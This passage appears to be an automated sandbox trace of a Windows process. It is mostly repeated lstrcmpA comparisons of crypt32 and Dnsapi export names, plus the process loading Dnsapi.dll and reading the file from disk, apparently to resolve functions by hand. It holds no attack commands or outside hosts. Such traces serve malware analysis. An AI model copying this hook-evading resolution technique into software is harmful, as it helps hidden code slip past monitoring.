lpString2="CertAddRefServerOcspResponse") returned 1 [0094.381] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0094.381] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0094.381] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0094.381] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0094.381] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0094.381] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0094.381] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0094.381] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0094.381] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0094.381] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0094.381] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0094.381] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0094.381] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0094.381] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0094.381] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0094.381] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0094.381] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0094.381] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0094.381] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0094.382] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0094.382] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0094.382] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0094.382] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0094.382] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0094.382] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0094.382] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0094.382] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0094.382] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0094.382] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0094.382] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0094.382] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0094.382] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0094.383] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0094.383] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0094.383] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0094.383] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0094.383] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0094.383] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0094.383] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0094.383] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0094.383] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0094.383] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0094.383] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0094.383] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0094.383] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0094.383] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0094.383] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0094.383] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0094.383] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0094.383] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0094.383] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0094.383] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0094.383] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0094.384] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0094.384] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0094.385] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0094.385] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0094.386] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0094.386] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0094.387] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0094.387] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0094.387] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0094.387] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0094.387] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0094.387] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0094.387] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0094.387] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0094.387] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0094.387] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0094.387] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0094.401] GetProcessHeap () returned 0x570000 [0094.401] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4179040 | out: hHeap=0x570000) returned 1 [0094.563] GetProcessHeap () returned 0x570000 [0094.563] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x589060 [0094.564] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0094.582] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0094.582] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0094.582] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0094.582] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0094.583] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0094.583] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0094.583] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0094.583] GetProcessHeap () returned 0x570000 [0094.583] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa7b88) returned 0x3aed010 [0094.585] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0094.585] ReadFile (in: hFile=0x17c, lpBuffer=0x3aed010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3aed010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0094.807] CloseHandle (hObject=0x17c) returned 1 [0094.807] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0094.807] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.807] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0094.807] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.807] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.807] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0094.807] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.807] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.807] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0094.807] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0094.807] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.808] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.808] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0094.808] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0094.808] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0094.808] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.808] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.808] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0094.808] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0094.808] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0094.808] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0094.808] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.808] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.808] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0094.808] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0094.808] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0094.808] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0094.808] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0094.808] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.808] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.808] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0094.808] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0094.808] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0094.808] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0094.808] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0094.808] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0094.808] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.808] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.808] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0094.808] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0094.808] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0094.809] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0094.809] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0094.809] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0094.809] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0094.809] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.809] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.809] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0094.809] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0094.809] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0094.809] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0094.809] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0094.809] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0094.809] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0094.809] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0094.809] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.809] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.809] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0094.809] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0094.809] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0094.810] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0094.810] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0094.810] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0094.810] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0094.810] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0094.810] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0094.810] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.810] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.810] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0094.810] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0094.810] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0094.810] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0094.810] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0094.810] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0094.810] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0094.810] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0094.810] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0094.810] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0094.810] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.810] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.810] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0094.810] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0094.811] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0094.811] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0094.811] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0094.812] lstrcmpA 